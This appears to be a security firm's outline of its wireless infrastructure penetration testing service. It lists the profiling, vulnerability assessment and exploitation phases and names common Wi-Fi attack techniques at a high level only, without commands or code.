Wireless Infrastructure Testing

Weak encryption, authentication and security policies implementations of your wireless infrastructure could allow malicious entities to access your corporate network and confidential data.

The Wireless Infrastructure Testing Methodology is divided into three distinct phases; Profiling, Assessment and Exploitation.

Profiling Phase

Information Gathering (Reconnaissance) techniques will be performed to gather as much information as possible about the customer’s wireless infrastructure.

 

Specifically, the following techniques will be used to find and assess any security-related information:-

Information Gathering (Reconnaissance)

Network Name (SSID) – Identifying all related SSIDs

 

MAC Locking – Identifying possible MAC locking mechanisms

MAC of AP (BSSID) – Identifying MAC addresses of related Access Points

 

Authentication Protocols – Identifying Authentication Protocols in use (Such as WEP, WPA, WPA2, WPS)

 

Channel of AP (1-12) – Identifying the Channel that the Access Point is running on

 

Authentication Methods – Identifying Authentication Methods in use (Such as Pre-Shared / Personal, Enterprise / RADIUS)

 

MAC of Clients – Identifying connected Clients and their MAC Addresses

 

Integrity Checks – Identifying Integrity Checks in use (Such as TKIP, AES-based CCMP)

 

Signal Strength – Identifying the Access Point’s Signal Strength

 

Authentication Options – Identifying Authentication Options in use (Such as LEAP, EAP-TLS, EAP-TTLS, EAP-SIM)

 

Rogue AP – Identifying possible Rogue Access Points

 

Encapsulation Protocols – Identifying Encapsulation Protocols in use (Such as IEEE 802.1x, PEAP / EAP-MSCHAPv2 / EAP-GTC, PANA)

 

Assessment Phase

Both automated and manual vulnerability assessment will be performed - based on the information found from the Profiling Phase - against the customer’s wireless infrastructure to ensure that all known and unknown vulnerabilities will be identified.

 

Specifically, the following vulnerability assessment techniques will be used:-

Vulnerability Assessment

WEP Attacks – Possibilities to bypass vulnerable WEP authentication using known WEP attacks (Such as ARP Replay, Fragmentation, Caffe-Latte, ChpChop, Hirte etc.) for both TKIP and AES based authentications.

Brute-forcing weak Password Policy – Capture Unencrypted Domain Names and User Names (or Guessing) and Brute-forcing for common passwords. Brute-forcing WPS PIN and capturing configuration (including PSK).

 

Pre-Shared Key (PSK) – Possibilities to capture the Pre-Shared Key for WEP, WPA and WPA2.

Man-In-The-Middle (MITM) – Man-In-The-Middle techniques will be used against the Client and the Access Point.

 

MAC Spoofing – In case of MAC Locking, MAC Spoofing techniques will be used to bypass security mechanisms.

Denial-of-Service (DOS) – Identify if Access Point(s) are vulnerable to Denial-of-Service Attacks.

Exploitation Phase

At the exploitation stage we will try to exploit and validate the existence of the identified vulnerabilities. Both online and offline password cracking techniques (e.g. Guessing, Dictionary, Hybrid, Brute-force) will be performed against password hashes (e.g. Pre-Shared Key) and/or authentication points found from previous steps of testing. In case of successful exploitation we will try to escalate privileges within applications, hosts and networks.